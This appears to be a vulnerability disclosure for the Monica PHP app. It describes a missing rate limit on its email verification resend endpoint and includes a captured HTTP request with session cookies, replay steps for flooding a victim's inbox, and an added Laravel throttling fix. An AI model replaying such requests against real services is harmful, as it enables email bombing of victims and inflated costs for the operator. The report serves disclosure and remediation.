monica

Vulnerability: Business Logic Errors (CWE-840)
Severity: 8.8
Language: PHP
Registry: other

✍️ Description

Bypass the rate limit and send unlimited emails to any email address.

🕵️‍♂️ Proof of Concept

During email verification resending there is no rate limit, which allows an attacker to send unlimited emails to any mail address.

  1. First, go to your account in monicahq and visit https://app.monicahq.com/settings. Here, change the email address to the victim's email address, e.g. xyz@gmail.com.

Here the user can request another verification link by clicking "click here to request another" (see the attached image link below). Click this link and capture the request in Burp Suite. The email resending request looks like the request below:

POST /email/resend HTTP/1.1
Host: app.monicahq.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: null
Connection: close
Cookie: __cfduid=d45dfa12b4cde7f49ebc02357f8a751861619252940; XSRF-TOKEN=eyJpdiI6Ild5Q1NWYWlxYnhmSzNsUGZ1bEZRS1E9PSIsInZhbHVlIjoiSURaeWZsUEt0dmJkY2kzYWlvWmFhOTk2SCtMQ0lUM2FvTWpnTDZUZHgvNEphZEI4dW0zbm56aDlmOS9aRHhVTHlqbm92RU1yM2FneXhTSENjRzdWNmRQVUE1ZFFBc01NNFU5VFcwOElWTWI0aFE5K0xiUkRmQnFhRE9rbUwxS1MiLCJtYWMiOiJjZmE1MTExODA3NWY0ZTM1ZGIyZTMzNDAwMWMwMDk1ODQzN2RmNjE0M2FjMjE4NWM1ZjA2NzE4M2E5Y2Y1ZTNlIn0%3D; laravel_session=eyJpdiI6Im1ZVnpJV2tUUkNBZVdYV21FckZwNnc9PSIsInZhbHVlIjoickFnV0JRaFd2MU1WeUZodVZzZGxmZlBLOWZhQXhhMmFJR1ZZTzVEdnd5a212V05GbDlBZ2hIVVVBSVFpZEREb3Z1STZDc1k1a21wQ3Y5cmxXeUZIbkNCK09iMWREVjJXVHFkZkh6OHB5WTJmaVhmRWxmSWVYdEFZM09wUGdjS2YiLCJtYWMiOiI4YjRkMjk0NmQwMGMxYzQxNjJiYzY4NmQ5MzRiNTFjNjUxYTQ5OTBkZDJhMjU1Y2U5ZDQwNjhiMGFiMmNkNTIwIn0%3D; laravel_token=[value omitted]%3D
Upgrade-Insecure-Requests: 1

_token=g3WkdnImU42bV9weoULD8CeMGrkRl9jAcw704reP

Now send this request an unlimited number of times and the victim's email address will receive unlimited verification emails. The attacker can also script this in Python and send unlimited emails.

You should set a rate limit on this endpoint to prevent this.
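One way to apply that rate limit, shown here as an added example and not Monica's own code: the application is a Laravel app (the `laravel_session` cookie in the captured request), and Laravel ships a `throttle` middleware that can be bound to a named limiter. The route path `/email/resend` is taken from the captured request; the limiter name, the controller class, the numeric limits and the Laravel 9/10 provider layout are assumptions for this illustration.

```php
<?php
// Added example (not part of the Monica code base). Assumes Laravel 9 or 10,
// where named rate limiters are registered in RouteServiceProvider.

// --- app/Providers/RouteServiceProvider.php ---
namespace App\Providers;

use Illuminate\Cache\RateLimiting\Limit;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\RateLimiter;

class RouteServiceProvider extends \Illuminate\Foundation\Support\Providers\RouteServiceProvider
{
    protected function configureRateLimiting(): void
    {
        // Key the limit on the authenticated account (fall back to the client IP
        // for unauthenticated callers). Keying on the account means the sender's
        // own account is throttled no matter which target address it has set,
        // so changing the address to a victim's does not reset the counter.
        RateLimiter::for('verification-resend', function (Request $request) {
            $key = $request->user()
                ? 'user:' . $request->user()->id
                : 'ip:' . $request->ip();

            // Returning several Limit objects applies all of them:
            // a short burst limit plus a daily cap (numbers are assumptions).
            return [
                Limit::perMinute(6)->by($key),
                Limit::perDay(20)->by($key),
            ];
        });
    }
}

// --- routes/web.php ---
use App\Http\Controllers\Auth\VerificationController; // assumed controller name
use Illuminate\Support\Facades\Route;

// The resend endpoint from the captured request, now requiring a logged-in user
// and passing through the named limiter above.
Route::post('/email/resend', [VerificationController::class, 'resend'])
    ->middleware(['auth', 'throttle:verification-resend'])
    ->name('verification.resend');
```

Once the middleware is in place, requests beyond the limit receive an HTTP 429 response with a `Retry-After` header, which is also the check to run after deploying the fix: replaying the captured request a seventh time within a minute should return 429 rather than another verification email.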

💥 Impact

An attacker can send unlimited emails to any mail address. Many email service providers have a limited sending quota, e.g. 10000 emails per month, and charge extra if that limit is exceeded. So, using this attack, an attacker can exceed that limit and the company will be charged extra money.